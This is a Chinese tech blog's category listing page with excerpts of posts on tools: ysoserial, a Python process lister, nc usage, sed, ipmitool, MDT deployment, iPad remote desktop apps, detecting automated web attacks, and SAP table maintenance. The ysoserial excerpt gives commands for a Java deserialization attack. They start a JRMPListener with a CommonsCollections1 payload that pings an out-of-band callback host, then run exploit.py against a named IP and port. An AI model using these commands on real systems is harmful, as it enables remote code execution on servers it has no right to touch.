天道酬勤,学无止境

工具

反序列化工具ysoserial使用介绍

反序列化工具ysoserial使用介绍 0x00 ysoserial是什么? ysoserial集合了各种java反序列化payload;下载地址:https://github.com/angelwhu/ysoserial 0x01 基本使用方法 在公网vps上执行: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 【port】 CommonsCollections1 '【commands】' port:公网vps上监听的端口号commands:需要执行的命令例子: java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 1099 CommonsCollections1 'ping -c 2 rce.267hqw.ceye.io' 重启一个shell窗口: python exploit.py 【目标ip】 【目标端口】 ysoserial-0.0.6-SNAPSHOT-BETA-all.jar 【JRMPListener ip】 【JRMPListener port】 JRMPClient 列子: python exploit.py 118.89.53.139 7001

2021-11-22 17:57:24    分类:博客    ysoserial   使用   介绍   工具

python写的一个跨平台处理进程的工具

#!/usr/bin/python2.6 import os,sys,re,threading platform = sys.platform class show_ps(): def __init__(self,command,name): self.comm=command self.ps_name=name def show(self): if platform == 'linux2': lcmd = "ps -ef|grep -v grep|grep %s|awk '{print $2,$8}'"% (self.ps_name) date=os.popen(lcmd).readlines() outputlist = [] for row in date: list = row.split() outputlist.append(list) return outputlist elif platform == 'win32': cmd = 'tasklist /FI "IMAGENAME eq %s" /NH'% (self.ps_name) data = os.popen(cmd).readlines() outputlist = [] pid = [] for row in data: string = row[0:35] list = string.split()

2021-06-02 19:02:42    分类:博客    工具      python

linux nc命令参数及用法详解

功能说明:功能强大的网络工具 nc [-hlnruz][-g<网关...>][-G<指向器数目>][-i<延迟秒数>][-o<输出文件>][-p<通信端口>][-s<来源位址>][-v...][-w<超时秒数>][主机名称][通信端口...] cat)最新版×××及nc命令详解 http://www.linuxso.com/a/linuxdownload/soft/230.html cp) failed: Connection refused Connection to 192.168.2.34 22 port [tcp/ssh] succeeded! nc: connect to 192.168.2.34 port 23 (tcp) failed: Connection refused nc: connect to 192.168.2.34 port 24 (tcp) failed: Connection refused nc -l 监听端口 > 要接收的文件名 nc -l 4444 > cache.tar.gz 源主机发起请求 nc 目的主机ip 目的端口 nc 192.168.0.85 4444 netstat 如下 [root@localhost jiangbao]# netstat -tpln tcp 0 0 0.0.0.0:4444 0.0.0.0:* LISTEN

2021-06-02 18:57:53    分类:博客    linux   工具   休闲   linux

iPAD上的远程桌面客户端工具

威锋网的版主大人要我写篇Wyse的评论,最好还有图,于是随便捣鼓一篇。 俺们IT人士因为工作需要,常常需要连回公司网络,进行一些网管的工作。Remote Desktop是我们常用的工具。在Windows 下面很简单,mstsc命令,IT人都懂。但是在iPAD上有什么好的远程桌面的App么? 在iTUNE上搜一下Remote Desktop,出来一大堆,不过要仔细甄别,不是所有的都符合要求。 基本上iPAD上的远程桌面工具分为3类。 一类是VNC客户端。比如下面的VNC Viewer ($9.99),iTap VNC client($11.99),Connect Desktop($4.99),Mocha VNC ($5.99),iTeleport: Jaadu VNC($24.99)等。 VNC服务端有Windows/MAC/Linux版本,都是免费的,是应用非常广泛的一个远程桌面工具。不过速度比较慢。我还是偏好RDP。 第二类是RDP客户端。主要用于远程桌面到Windows的电脑。支持XP,Win7,Windows Server 2000/2003/2008/2008R2 比如下面的Remote Desktop($5.99), Wyse PocketCloud RemoteDesktop client ($14.99), iTap RDP Client ($11.99)

2021-06-02 18:40:04    分类:博客    职场   工具   客户端   Apple

文本处理工具sed

1 :处理文本的工具sed sed 本身就是一个自动打印工具Stream EDitor, 行编辑器 sed 批量改文件 语法 sed 【 选项】 【sed自己的脚本】 【 input 文件】.....、sed是一种流编辑器,它一次处理一行内容。处理时,把当前处理的行存储在临时缓冲区中,称为“模式空间”(pattern space),接着用sed命令处理缓冲区中的内容,处理完成后,把缓冲区的内容送往屏幕。然后读入下行,执行下一个循环。如果没有使诸如‘D’的特殊命令,那会在两个循环之间清空模式空间,但不会清空保留空间。这样不断重复,直到文件末尾。文件内容并没有改变,除非你使用重定向存储输出。功能:主要用来自动编辑一个或多个文件,简化对文件的反复操作,编写转换程序等参考: http://www.gnu.org/software/sed/manual/sed.ht 2 :sed工具用法:sed [option]... 'script' inputfile...常用选项:-n:不输出模式空间内容到屏幕,即不自动打印,相当于把默认打印关闭啦-e: 多点编辑-f:/PATH/SCRIPT_FILE: 从指定文件中读取编辑脚本-r: 支持使用扩展正则表达式-i.bak: 备份文件并原处编辑 -i 直接删除 .bak 在删除之前备份script:(脚本) sed 后面跟的脚本需加单引号

2021-06-02 00:38:47    分类:博客    文本   处理   工具

IPMI之Ipmitool工具

IPMI(Intelligent Platform Management Interface)智能平台管理接口 (IPMI) 是一种开放标准的硬件管理接口规格,定义了嵌入式管理子系统进行通信的特定方法。IPMI 信息通过基板管理控制器 (BMC)(位于 IPMI 规格的硬件组件上)进行交流。使用低级硬件智能管理而不使用操作系统进行管理,具有两个主要优点: 首先,此配置允许进行带外服务器管理;其次,操作系统不必负担传输系统状态数据的任务。IPMI的核心是一个专用芯片/控制器(叫做服务器处理器或基板管理控制器(BMC)),其并不依赖于服务器的处理器、BIOS或操作系统来工作,可谓非常地独立,是一个单独在系统内运行的无代理管理子系统,IPMI功能:监控服务器的物理健康特征,如温度、电压、风扇工作状态、电源状态等;可以通过串口、Modem以及Lan等远程环境管理服务器系统,如远程开关机;IPMITOOLipmitool 是一种可用在 linux 系统下的命令行方式的 ipmi 平台管理工具,它支持 ipmi 1.5 规范(最新的规范为 ipmi 2.0),通过它可以实现获取传感器的信息、显示系统日志内容、网络远程开关机等功能。使用:ipmitool –I open sensor list #命令可以获取传感器中的各种监测值和该值的监测阈值,包括(CPU温度,电压,风扇转速,电源调制模块温º

2021-06-01 23:52:10    分类:博客    IPMI   ipmitool   工具   linux

实战 MDT 2012(一)---工具准备

MDT2012是微软最新推出的一款企业轻量级接触部署工具,支持批量部署最新版本的操作系统,如Windows 8和Windows 2012,但是本次系列博文为了更贴近实战,还是以部署Windows 7为主,在这里我们将详细的演示MDT2012组件的安装、模板机制作以及基于镜像的部署和升级流程等 下图为整个环境的拓扑图 以下是本次测试用到的计算机相关参数 下面就一步步开始来完成整个操作过程 一、安装DHCP服务器 客户端通过PXE启动后,需要通过网络加载WDS服务器的启动镜像,DHCP服务器的作用是为PXE启动的客户端分配IP地址 从服务器cqdep上打开服务器管理器,添加角色,勾选【DHCP服务器】 绑定网络连接 设置为客户端分配的DNS服务器地址 选择不需要WINS 添加作用域,在这里指定为客户端分配的IP地址段、子网掩码和网关(注意:不要指定正在使用的IP地址,以免冲突) 选择禁用IPv6 选择用当前凭据来为DHCP服务器授权 单击【安装】 二、安装WDS服务器 WDS服务器在本次实验环境中的作用是为需要安装操作系统的客户端提供PXE引导,并且下发MDT服务器生成的PE 在添加角色向导中,勾选【Windows 部署服务】 默认勾选上了【部署服务器】和【传输服务器】 单击【安装】 三、配置WDS服务器 WDS服务器安装完成后,需要进行配置,从管理工具中运行【Windows 部署服务

2021-06-01 20:07:27    分类:博客    工具   实战   准备   MDT&WDS

网站遭到***自动化***工具***的五个标志

下面是如何检测和反击使用的自动化工具来***你的网站的***。 ***喜欢用自动化SQL注入和远程文件包含***的工具。 ***者使用sqlmap,Havij,或NetSparker这样的软件来发现和利用网站漏洞是非常简单并迅速,甚至不用去专门的学习。 ***喜欢自动******有三个原因。第一个,也是最重要的一个,这些工具的使用,只需要非常少的技术,另外,开发人员通常将这些工具做为合法的***测试工具在***论坛或他们的网站上免费提供。 此外,它们可以使***只学习很少的技术,便可以非常快速的***大量的网站。 最后,被雇佣的***者使用这些仅仅在一段时间内有效的***工具,确实能够使服务器被盗用或遭到破坏。 现有一个好消息: 如果能够找到一种方法来发现和阻止自动***,你就可以发现是否有***在自动***你的站点。在本文中,我们将探索如何识别这些自动***工具在你的站点形成的恶意流量。 一.高传入请求率 最关键的一个标志就是,自动化***工具传入请求时的速度。根据Security strategy at data security company Imperva负责人 Rob Rachwald的指出,一个正常的用户访问者,不可能5秒内就生成超过1个http请求。相反,自动化***工具通常会每分钟产生70个以上—每秒超过1 个请求。正常访问者根本不可能产生这么多的请求。 乍一看

2021-05-19 09:21:49    分类:博客    ***   工具   开发   security

网维工具

功能还可以 喜欢用的自己看看来源:https://blog.51cto.com/sword221/68034

2021-05-19 08:47:07    分类:博客    网络   职场   工具   工具应用

ABAP--如何建立通过sap表维护工具来维护自定义表TCODE

在sap开发的过程中,经常需要自定义数据表,对于简单的数据表,我们可以通过sap的表维护工具生成维护代码,并建立自定义的TCODE来维护其数据。具体步骤如下: 一、建立自定义表(TCODE :SE11)1 在“Delivery and Maintenance”Tab屏幕设置“Data Browser/Table view Maint.”属性为“允许通过标准表格维护工具维护”2 设计表格字段3 设置表格技术设置,菜单:转到-》技术设置4 保存激活。 二、生成维护代码生成维护代码代码有两个途径:1、se11界面的菜单:实用程序-》Table Maintenance Generator其实这里就是调用SE542、通过TCODE: SE54 三、建立自定义CODE(TCODE:SE93)有三种方法来建立自己的TCODE来维护自定义表;1 通过SM30维护进入TCODE:SE93建立新TCODE,tcode类型选择为:“Transaction with parameters(parameter transaction)”;事务栏输入“SM30”;选中“跳过起始屏幕”;选中“Inherit GUI attribute”;输入默认字段:VIEWNAME = '自定义的表名' 和UPDATE = 'X';保存激活即可;2 通过RS_TABLE_LIST

2021-05-19 08:31:56    分类:博客    工具   维护   休闲   abap开发